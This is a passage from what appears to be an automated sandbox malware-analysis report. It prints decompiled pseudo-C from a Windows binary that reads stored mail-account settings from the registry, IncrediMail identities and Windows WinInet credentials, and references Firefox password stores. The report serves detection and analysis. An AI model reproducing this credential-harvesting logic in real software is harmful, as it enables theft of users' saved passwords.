                                                  0x0040d31e
                                                  0x0040d32b
                                                  0x0040d32d
                                                  0x0040d32d
                                                  0x0040d333
                                                  0x0040d338
                                                  0x0040d339
                                                  0x0040d342
                                                  0x0040d344
                                                  0x0040d344
                                                  0x0040d34a
                                                  0x0040d34c
                                                  0x0040d354
                                                  0x0040d35a
                                                  0x0040d360
                                                  0x0040d360
                                                  0x0040d363
                                                  0x0040d364
                                                  0x00000000
                                                  0x0040d31e

                                                  APIs
                                                    • Part of subcall function 00406C2F: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040D205,?,?,?,?), ref: 00406C48
                                                    • Part of subcall function 00406C2F: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00406C74
                                                    • Part of subcall function 0040462E: free.MSVCRT(00000000,0040BC35), ref: 00404635
                                                    • Part of subcall function 004061FF: strcpy.MSVCRT(?,?,0040D228,?,?,?,?,?), ref: 00406204
                                                    • Part of subcall function 004061FF: strrchr.MSVCRT ref: 0040620C
                                                    • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C551
                                                    • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C565
                                                    • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C579
                                                    • Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C646
                                                    • Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C6A6
                                                  • strlen.MSVCRT ref: 0040D241
                                                  • strlen.MSVCRT ref: 0040D24F
                                                    • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                    • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                  • memset.MSVCRT ref: 0040D28F
                                                  • strlen.MSVCRT ref: 0040D29E
                                                  • strlen.MSVCRT ref: 0040D2AC
                                                  • _stricmp.MSVCRT(00000504,none,?,?,?), ref: 0040D339
                                                  • strcpy.MSVCRT(00000004,00000204,?,?,?), ref: 0040D354
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memsetstrlen$strcpy$memcpy$CloseFileHandleSize_stricmpfreestrcatstrrchr
                                                  • String ID: none$signons.sqlite$signons.txt
                                                  • API String ID: 2681923396-1088577317
                                                  • Opcode ID: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
                                                  • Instruction ID: 747294efef189d2a86bae337d02489a359e47e35f4212505bb9232dde5c11721
                                                  • Opcode Fuzzy Hash: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
                                                  • Instruction Fuzzy Hash: 3041E3B1508246AAD710EBB1CC81BDAB798AF40305F10057FE596E21C2EB7CE9C9876D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402C44, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104registryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00402C44(void* __ecx, void* __fp0, intOrPtr _a4) {
				void* _v8;
				int _v12;
				char _v16;
				char _v20;
				void _v275;
				char _v276;
				void _v1299;
				char _v1300;
				void* __esi;
				void* _t35;
				intOrPtr _t36;
				void* _t40;
				void* _t52;
				void* _t58;
				void* _t60;
				void* _t64;
				char* _t66;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t83;

				_t83 = __fp0;
				_t64 = __ecx;
				_t35 = E0040EB3F(0x80000001, "Identities",  &_v8);
				_t74 = _t73 + 0xc;
				if(_t35 == 0) {
					_v12 = 0;
					_v276 = 0;
					memset( &_v275, 0, 0xff);
					_t40 = E0040EC05(_v8, 0,  &_v276);
					_t75 = _t74 + 0x18;
					if(_t40 == 0) {
						_t66 = "%s\\%s";
						do {
							_t69 = _a4;
							E0040EBC1(_t64, _v8,  &_v276, "Username", _a4 + 0xa9c, 0x7f);
							_v1300 = 0;
							memset( &_v1299, 0, 0x3ff);
							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Internet Account Manager\\Accounts");
							_t52 = E0040EB3F(_v8,  &_v1300,  &_v16);
							_t76 = _t75 + 0x3c;
							_t80 = _t52;
							if(_t52 == 0) {
								E00402BB8(_t64,  &_v16, _t80, _t83, _t69, 1);
							}
							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts");
							_t58 = E0040EB3F(_v8,  &_v1300,  &_v20);
							_t77 = _t76 + 0x1c;
							_t81 = _t58;
							if(_t58 == 0) {
								E00402BB8(_t64,  &_v20, _t81, _t83, _a4, 5);
							}
							_v12 = _v12 + 1;
							_t60 = E0040EC05(_v8, _v12,  &_v276);
							_t75 = _t77 + 0xc;
						} while (_t60 == 0);
					}
					RegCloseKey(_v8);
				}
				_t36 = _a4;
				 *((char*)(_t36 + 0xa9c)) = 0;
				return _t36;
			}


























                                                  0x00402c44
                                                  0x00402c44
                                                  0x00402c5c
                                                  0x00402c61
                                                  0x00402c68
                                                  0x00402c7b
                                                  0x00402c7e
                                                  0x00402c84
                                                  0x00402c94
                                                  0x00402c99
                                                  0x00402c9e
                                                  0x00402ca6
                                                  0x00402cab
                                                  0x00402cab
                                                  0x00402cc6
                                                  0x00402cd8
                                                  0x00402cde
                                                  0x00402cf7
                                                  0x00402d0a
                                                  0x00402d0f
                                                  0x00402d12
                                                  0x00402d14
                                                  0x00402d1c
                                                  0x00402d1c
                                                  0x00402d35
                                                  0x00402d48
                                                  0x00402d4d
                                                  0x00402d50
                                                  0x00402d52
                                                  0x00402d5c
                                                  0x00402d5c
                                                  0x00402d61
                                                  0x00402d71
                                                  0x00402d76
                                                  0x00402d79
                                                  0x00402d82
                                                  0x00402d86
                                                  0x00402d86
                                                  0x00402d8c
                                                  0x00402d8f
                                                  0x00402d97

                                                  APIs
                                                    • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                  • memset.MSVCRT ref: 00402C84
                                                    • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402D86
                                                    • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                  • memset.MSVCRT ref: 00402CDE
                                                  • sprintf.MSVCRT ref: 00402CF7
                                                  • sprintf.MSVCRT ref: 00402D35
                                                    • Part of subcall function 00402BB8: memset.MSVCRT ref: 00402BD8
                                                    • Part of subcall function 00402BB8: RegCloseKey.ADVAPI32 ref: 00402C3C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Closememset$sprintf$EnumOpen
                                                  • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                  • API String ID: 1831126014-3814494228
                                                  • Opcode ID: e558669e5098f51d47a130cd26e8095db06e1949dd15f7d6cacb61a667ea587b
                                                  • Instruction ID: 6c0256c292ffb55b53f7a2730c4bcad7d13cefd93b753116a94389aae211c0df
                                                  • Opcode Fuzzy Hash: e558669e5098f51d47a130cd26e8095db06e1949dd15f7d6cacb61a667ea587b
                                                  • Instruction Fuzzy Hash: 25315C72D0011DBADB11EA96CD46EEFB77CAF04344F0405BABA19F2091E6B49F988F54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040B53C, Relevance: 16.6, APIs: 11, Instructions: 133windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E0040B53C(void* __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				intOrPtr _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __esi;
				signed int _t45;
				intOrPtr _t50;
				signed int _t53;
				intOrPtr _t82;
				signed char _t86;
				intOrPtr _t88;
				intOrPtr _t90;
				void* _t91;
				void* _t92;

				_t84 = __ecx;
				_t88 = _a4;
				_t92 = _t88 - 0x402;
				_t91 = __ecx;
				if(_t92 > 0) {
					_t45 = _t88 - 0x415;
					__eflags = _t45;
					if(_t45 == 0) {
						E0040A4C8(__ecx);
						L22:
						__eflags = 0;
						E0040A27F(0, _t84, _t91, 0);
						L23:
						if(_t88 ==  *((intOrPtr*)(_t91 + 0x374))) {
							_t81 = _a12;
							_t86 =  *(_a12 + 0xc);
							_t50 =  *((intOrPtr*)(_t91 + 0x370));
							if((_t86 & 0x00000008) == 0) {
								__eflags = _t86 & 0x00000040;
								if((_t86 & 0x00000040) != 0) {
									 *0x4171ac =  *0x4171ac & 0x00000000;
									__eflags =  *0x4171ac;
									SetFocus( *(_t50 + 0x184));
								}
							} else {
								E00409D7E(_t50, _t81);
							}
						}
						return E004019AC(_t91, _t88, _a8, _a12);
					}
					_t53 = _t45 - 1;
					__eflags = _t53;
					if(_t53 == 0) {
						E0040A56C(__ecx);
						goto L22;
					}
					__eflags = _t53 == 6;
					if(_t53 == 6) {
						SetFocus( *(__ecx + 0x378));
					}
					goto L23;
				}
				if(_t92 == 0) {
					 *(__ecx + 0x25c) =  *(__ecx + 0x25c) & 0x00000000;
					E0040A437(__ecx);
					goto L22;
				}
				if(_t88 == 0x1c) {
					__eflags = _a8;
					if(_a8 == 0) {
						 *((intOrPtr*)(_t91 + 0x378)) = GetFocus();
					} else {
						PostMessageA( *(__ecx + 0x108), 0x41c, 0, 0);
					}
					goto L23;
				}
				if(_t88 == 0x20) {
					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x114));
					if(_a8 !=  *((intOrPtr*)(__ecx + 0x114))) {
						goto L23;
					}
					SetCursor(LoadCursorA( *0x416b94, 0x67));
					return 1;
				}
				if(_t88 == 0x2b) {
					_t82 = _a12;
					__eflags =  *((intOrPtr*)(_t82 + 0x14)) -  *((intOrPtr*)(__ecx + 0x114));
					if( *((intOrPtr*)(_t82 + 0x14)) ==  *((intOrPtr*)(__ecx + 0x114))) {
						SetBkMode( *(_t82 + 0x18), 1);
						SetTextColor( *(_t82 + 0x18), 0xff0000);
						_v8 = SelectObject( *(_t82 + 0x18),  *(__ecx + 0x258));
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t90 = _a12;
						_v28 = 0x14;
						_v20 = 5;
						DrawTextExA( *(_t90 + 0x18), __ecx + 0x158, 0xffffffff, _t90 + 0x1c, 4,  &_v28);
						SelectObject( *(_t90 + 0x18), _v8);
						_t88 = _a4;
					}
				} else {
					if(_t88 == 0x7b) {
						_t87 = _a8;
						if(_a8 ==  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x370)) + 0x184))) {
							E0040B372(__ecx, _t87);
						}
					}
				}
				goto L23;
			}


















                                                  0x0040b53c
                                                  0x0040b545
                                                  0x0040b54d
                                                  0x0040b54f
                                                  0x0040b551
                                                  0x0040b689
                                                  0x0040b689
                                                  0x0040b68e
                                                  0x0040b6b1
                                                  0x0040b6b6
                                                  0x0040b6b6
                                                  0x0040b6b8
                                                  0x0040b6bd
                                                  0x0040b6c3
                                                  0x0040b6c5
                                                  0x0040b6c8
                                                  0x0040b6ce
                                                  0x0040b6d4
                                                  0x0040b6dd
                                                  0x0040b6e0
                                                  0x0040b6e8
                                                  0x0040b6e8
                                                  0x0040b6ef
                                                  0x0040b6ef
                                                  0x0040b6d6
                                                  0x0040b6d6
                                                  0x0040b6d6
                                                  0x0040b6d4
                                                  0x00000000
                                                  0x0040b6fe
                                                  0x0040b690
                                                  0x0040b690
                                                  0x0040b691
                                                  0x0040b6a8
                                                  0x00000000
                                                  0x0040b6a8
                                                  0x0040b693
                                                  0x0040b696
                                                  0x0040b69e
                                                  0x0040b69e
                                                  0x00000000
                                                  0x0040b696
                                                  0x0040b557
                                                  0x0040b679
                                                  0x0040b680
                                                  0x00000000
                                                  0x0040b680
                                                  0x0040b560
                                                  0x0040b651
                                                  0x0040b654
                                                  0x0040b671
                                                  0x0040b656
                                                  0x0040b663
                                                  0x0040b663
                                                  0x00000000
                                                  0x0040b654
                                                  0x0040b569
                                                  0x0040b626
                                                  0x0040b62c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040b641
                                                  0x00000000
                                                  0x0040b649
                                                  0x0040b572
                                                  0x0040b59e
                                                  0x0040b5a4
                                                  0x0040b5aa
                                                  0x0040b5b5
                                                  0x0040b5c3
                                                  0x0040b5da
                                                  0x0040b5e2
                                                  0x0040b5e3
                                                  0x0040b5e4
                                                  0x0040b5e5
                                                  0x0040b5e6
                                                  0x0040b5ff
                                                  0x0040b606
                                                  0x0040b60d
                                                  0x0040b619
                                                  0x0040b61b
                                                  0x0040b61b
                                                  0x0040b574
                                                  0x0040b577
                                                  0x0040b583
                                                  0x0040b58c
                                                  0x0040b594
                                                  0x0040b594
                                                  0x0040b58c
                                                  0x0040b577
                                                  0x00000000

                                                  APIs
                                                  • SetBkMode.GDI32(?,00000001), ref: 0040B5B5
                                                  • SetTextColor.GDI32(?,00FF0000), ref: 0040B5C3
                                                  • SelectObject.GDI32(?,?), ref: 0040B5D8
                                                  • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040B60D
                                                  • SelectObject.GDI32(00000014,?), ref: 0040B619
                                                    • Part of subcall function 0040B372: GetCursorPos.USER32(?), ref: 0040B37F
                                                    • Part of subcall function 0040B372: GetSubMenu.USER32 ref: 0040B38D
                                                    • Part of subcall function 0040B372: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B3BA
                                                  • LoadCursorA.USER32 ref: 0040B63A
                                                  • SetCursor.USER32(00000000), ref: 0040B641
                                                  • PostMessageA.USER32 ref: 0040B663
                                                  • SetFocus.USER32(?), ref: 0040B69E
                                                  • SetFocus.USER32(?), ref: 0040B6EF
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                  • String ID:
                                                  • API String ID: 1416211542-0
                                                  • Opcode ID: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
                                                  • Instruction ID: 8f05fcf81e8b57b2917fe7890bba9475612e1218cdf4c3fdd04c744704700eb5
                                                  • Opcode Fuzzy Hash: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
                                                  • Instruction Fuzzy Hash: E741A271100605EFCB119F64CD89EEE7775FB08300F104936E615A62A1CB799D91DBDE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405FC6, Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405FC6(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				long _v8;
				void* _v12;
				long _v16;
				void* _t14;
				void* _t29;
				void* _t34;
				long _t36;

				_v8 = _v8 & 0x00000000;
				EmptyClipboard();
				_t14 = E00405ECB(_a4);
				_v12 = _t14;
				if(_t14 == 0xffffffff) {
					_v8 = GetLastError();
				} else {
					_t36 = GetFileSize(_t14, 0);
					_t5 = _t36 + 1; // 0x1
					_t29 = GlobalAlloc(0x2000, _t5);
					if(_t29 == 0) {
						L4:
						_v8 = GetLastError();
					} else {
						_t34 = GlobalLock(_t29);
						if(ReadFile(_v12, _t34, _t36,  &_v16, 0) == 0) {
							goto L4;
						} else {
							 *((char*)(_t34 + _t36)) = 0;
							GlobalUnlock(_t29);
							SetClipboardData(1, _t29);
						}
					}
					CloseHandle(_v12);
				}
				CloseClipboard();
				return _v8;
			}










                                                  0x00405fcc
                                                  0x00405fd0
                                                  0x00405fd9
                                                  0x00405fe2
                                                  0x00405fe5
                                                  0x0040605b
                                                  0x00405fe7
                                                  0x00405ff3
                                                  0x00405ff5
                                                  0x00406004
                                                  0x00406008
                                                  0x0040603e
                                                  0x00406044
                                                  0x0040600a
                                                  0x00406013
                                                  0x00406026
                                                  0x00000000
                                                  0x00406028
                                                  0x00406029
                                                  0x0040602d
                                                  0x00406036
                                                  0x00406036
                                                  0x00406026
                                                  0x0040604a
                                                  0x00406052
                                                  0x0040605e
                                                  0x00406068

                                                  APIs
                                                  • EmptyClipboard.USER32 ref: 00405FD0
                                                    • Part of subcall function 00405ECB: CreateFileA.KERNEL32(00410C96,80000000,00000001,00000000,00000003,00000000,00000000,00410BD2,?,rA,00410C96,?,?,*.oeaccount,rA,?), ref: 00405EDD
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00405FED
                                                  • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00405FFE
                                                  • GlobalLock.KERNEL32 ref: 0040600B
                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040601E
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040602D
                                                  • SetClipboardData.USER32 ref: 00406036
                                                  • GetLastError.KERNEL32 ref: 0040603E
                                                  • CloseHandle.KERNEL32(?), ref: 0040604A
                                                  • GetLastError.KERNEL32 ref: 00406055
                                                  • CloseClipboard.USER32 ref: 0040605E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                  • String ID:
                                                  • API String ID: 3604893535-0
                                                  • Opcode ID: 5804eb7593f705abb245538e10f585bb03ca14e3a9190401cfadc2aaba18f8ee
                                                  • Instruction ID: 732aa9399b2cd23c9d945101f46e029b0eae2bee8c87a14991e63b5ea8a72c25
                                                  • Opcode Fuzzy Hash: 5804eb7593f705abb245538e10f585bb03ca14e3a9190401cfadc2aaba18f8ee
                                                  • Instruction Fuzzy Hash: 6A113371900205FBDB109BB4DE4DBDE7F78EB08351F118176F606E1190DBB48A20DB69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040EDDB, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • strcpy.MSVCRT(?,Common Programs,0040EEF9,?,?,?,?,?,00000104), ref: 0040EE4E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strcpy
                                                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                  • API String ID: 3177657795-318151290
                                                  • Opcode ID: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
                                                  • Instruction ID: 838bbb5fcb7671a25bd4d31fd75230584a1d4f3c41bb848f6a939ae912ddcdf8
                                                  • Opcode Fuzzy Hash: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
                                                  • Instruction Fuzzy Hash: 66F0BDB32A878EF0D429496BCD4AEB744429151B46B7C4D37A002B46D5E87D8AF260DF
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040765B, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 152COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 74%
                                                  			E0040765B(void* __eflags, intOrPtr* _a4) {
				char _v532;
				short _v534;
				void _v1042;
				void _v1044;
				long _v1080;
				intOrPtr _v1084;
				intOrPtr _v1088;
				intOrPtr _v1096;
				int _v1104;
				char _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				long* _v1136;
				wchar_t* _v1140;
				wchar_t* _v1144;
				intOrPtr _v1148;
				char _v1152;
				intOrPtr _v1156;
				char _v1160;
				void* _v1164;
				void* _v1168;
				int _v1172;
				intOrPtr _v1176;
				char _v1180;
				char _v1184;
				signed int _v1188;
				void* __edi;
				void* __esi;
				void* _t76;
				int _t83;
				wchar_t* _t109;
				wchar_t* _t110;
				signed int _t120;
				int _t126;
				void* _t129;
				intOrPtr _t134;
				signed int _t140;
				void* _t142;
				void* _t143;
				void* _t144;

				_t142 = (_t140 & 0xfffffff8) - 0x4a4;
				_push(_t129);
				_v1108 = 0;
				_v1104 = 0;
				if(E00404647( &_v1108, _t129, __eflags) != 0) {
					_v1184 = 0;
					_v1180 = 0;
					if(_v1088 == 0) {
						_t76 = 0;
						__eflags = 0;
					} else {
						_t76 = _v1084(0, 0,  &_v1180,  &_v1184);
					}
					if(_t76 != 0) {
						_t120 = 9;
						memcpy( &_v1080, L"Microsoft_WinInet", _t120 << 2);
						_t143 = _t142 + 0xc;
						_v1172 = wcslen( &_v1080);
						_v1176 = 1;
						_v1188 = 0;
						if(_v1180 > 0) {
							while(_v1176 != 0) {
								_t134 =  *((intOrPtr*)(_v1184 + _v1188 * 4));
								_t83 = wcsncmp( *(_t134 + 8),  &_v1080, _v1172);
								_t143 = _t143 + 0xc;
								if(_t83 == 0) {
									do {
										_t25 = L"abe2869f-9b47-4cd9-a358-c22904dba7f7" + _t83; // 0x620061
										 *(_t83 + 0x417968) =  *_t25 << 2;
										_t83 = _t83 + 2;
										_t152 = _t83 - 0x4a;
									} while (_t83 < 0x4a);
									_v1148 =  *((intOrPtr*)(_t134 + 0x1c));
									_t139 =  &_v532;
									_v1160 = 0x4a;
									_v1156 = 0x417968;
									_v1152 =  *((intOrPtr*)(_t134 + 0x18));
									E004046D7( &_v532);
									if(E004047A0( &_v532, _t152) != 0 && E00404811(_t139,  &_v1152,  &_v1160,  &_v1168) != 0) {
										_v1044 = 0;
										memset( &_v1042, 0, 0x1fe);
										_t126 = _v1168;
										_t144 = _t143 + 0xc;
										if(_t126 > 0x1fa) {
											_t126 = 0x1fa;
										}
										memcpy( &_v1044, _v1164, _t126);
										_v1120 =  *((intOrPtr*)(_t134 + 0x20));
										_v1124 =  *((intOrPtr*)(_t134 + 4));
										_v1116 =  *((intOrPtr*)(_t134 + 0x10));
										_v1112 =  *((intOrPtr*)(_t134 + 0x14));
										_v1128 =  *((intOrPtr*)(_t134 + 0x2c));
										_v1144 =  *(_t134 + 8);
										_v1132 =  *((intOrPtr*)(_t134 + 0xc));
										_t109 =  &_v1044;
										_v534 = 0;
										_v1140 = _t109;
										_v1136 = 0x4125f4;
										_t110 = wcschr(_t109, 0x3a);
										_t143 = _t144 + 0x14;
										if(_t110 != 0) {
											 *_t110 = 0;
											_v1136 =  &(_t110[0]);
										}
										_v1180 =  *((intOrPtr*)( *_a4))( &_v1144);
										LocalFree(_v1168);
									}
									E004047F1( &_v532);
								}
								_v1188 = _v1188 + 1;
								if(_v1188 < _v1180) {
									continue;
								}
								goto L18;
							}
						}
						L18:
						_v1096(_v1184);
					}
				}
				return E004046C2( &_v1108);
			}















































                                                  0x00407661
                                                  0x0040766b
                                                  0x00407670
                                                  0x00407674
                                                  0x0040767f
                                                  0x00407689
                                                  0x0040768d
                                                  0x00407691
                                                  0x004076a8
                                                  0x004076a8
                                                  0x00407693
                                                  0x0040769f
                                                  0x0040769f
                                                  0x004076ac
                                                  0x004076b4
                                                  0x004076c3
                                                  0x004076c3
                                                  0x004076cf
                                                  0x004076d3
                                                  0x004076db
                                                  0x004076df
                                                  0x004076e5
                                                  0x004076f7
                                                  0x00407709
                                                  0x0040770e
                                                  0x00407713
                                                  0x00407719
                                                  0x00407719
                                                  0x00407724
                                                  0x0040772c
                                                  0x0040772d
                                                  0x0040772d
                                                  0x00407735
                                                  0x0040773c
                                                  0x00407743
                                                  0x0040774b
                                                  0x00407753
                                                  0x00407757
                                                  0x00407763
                                                  0x00407795
                                                  0x0040779d
                                                  0x004077a2
                                                  0x004077ab
                                                  0x004077b0
                                                  0x004077b2
                                                  0x004077b2
                                                  0x004077c1
                                                  0x004077c9
                                                  0x004077d0
                                                  0x004077d7
                                                  0x004077de
                                                  0x004077e5
                                                  0x004077ec
                                                  0x004077f3
                                                  0x004077f7
                                                  0x00407801
                                                  0x00407809
                                                  0x0040780d
                                                  0x00407815
                                                  0x0040781a
                                                  0x0040781f
                                                  0x00407821
                                                  0x00407827
                                                  0x00407827
                                                  0x0040783b
                                                  0x0040783f
                                                  0x0040783f
                                                  0x0040784c
                                                  0x0040784c
                                                  0x00407851
                                                  0x0040785d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040785d
                                                  0x004076e5
                                                  0x00407863
                                                  0x00407867
                                                  0x00407867
                                                  0x004076ac
                                                  0x0040787a

                                                  APIs
                                                    • Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,75D6F420), ref: 00404654
                                                    • Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                    • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                    • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                    • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                    • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                  • wcslen.MSVCRT ref: 004076C5
                                                  • wcsncmp.MSVCRT(?,?,?), ref: 00407709
                                                  • memset.MSVCRT ref: 0040779D
                                                  • memcpy.MSVCRT ref: 004077C1
                                                  • wcschr.MSVCRT ref: 00407815
                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040783F
                                                    • Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$FreeLibrary$LoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                  • String ID: J$Microsoft_WinInet$hyA
                                                  • API String ID: 2413121283-319027496
                                                  • Opcode ID: 3dbe31861b291603ba55481dc935e5bf9676d9bb6e305c4de7996f9a1c48bd4b
                                                  • Instruction ID: ab6451454baefbc6762688e22d5ebab6c31fbbbf8d38218599acfc9a6d4ef790
                                                  • Opcode Fuzzy Hash: 3dbe31861b291603ba55481dc935e5bf9676d9bb6e305c4de7996f9a1c48bd4b
                                                  • Instruction Fuzzy Hash: 2751E4B1908345AFC710EF65C88495AB7E8FF89304F00492EFA99D3250E778E955CB57
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402FC2, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 106registryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00402FC2(void* __eax, void* __ecx, void* __fp0, void* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				void _v271;
				char _v272;
				void _v527;
				char _v528;
				void _v827;
				char _v828;
				void* __edi;
				void* __esi;
				long _t40;
				void* _t44;
				void* _t55;
				void* _t60;
				void* _t66;
				void* _t67;
				void* _t71;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t77;

				_t77 = __fp0;
				_t66 = __ecx;
				_t67 = __eax;
				_t40 = E0040EB3F(_a4, "Software\\IncrediMail\\Identities",  &_a4);
				_t72 = _t71 + 0xc;
				if(_t40 == 0) {
					_v12 = 0;
					_v272 = 0;
					memset( &_v271, 0, 0xff);
					_t44 = E0040EC05(_a4, 0,  &_v272);
					_t73 = _t72 + 0x18;
					while(_t44 == 0) {
						E0040EBC1(_t66, _a4,  &_v272, "Identity", _t67 + 0xa9c, 0x7f);
						_v828 = 0;
						memset( &_v827, 0, 0x12b);
						sprintf( &_v828, "%s\\Accounts",  &_v272);
						_t55 = E0040EB3F(_a4,  &_v828,  &_v8);
						_t74 = _t73 + 0x38;
						if(_t55 == 0) {
							_v16 = 0;
							_v528 = 0;
							memset( &_v527, 0, 0xff);
							_t60 = E0040EC05(_v8, 0,  &_v528);
							_t74 = _t74 + 0x18;
							while(_t60 == 0) {
								E00402D9A(_t66, _t67, 0xff, _t77, _v8,  &_v528);
								_v16 = _v16 + 1;
								_t60 = E0040EC05(_v8, _v16,  &_v528);
								_t74 = _t74 + 0xc;
							}
							RegCloseKey(_v8);
						}
						_v12 = _v12 + 1;
						_t44 = E0040EC05(_a4, _v12,  &_v272);
						_t73 = _t74 + 0xc;
					}
					_t40 = RegCloseKey(_a4);
				}
				 *((char*)(_t67 + 0xa9c)) = 0;
				return _t40;
			}

























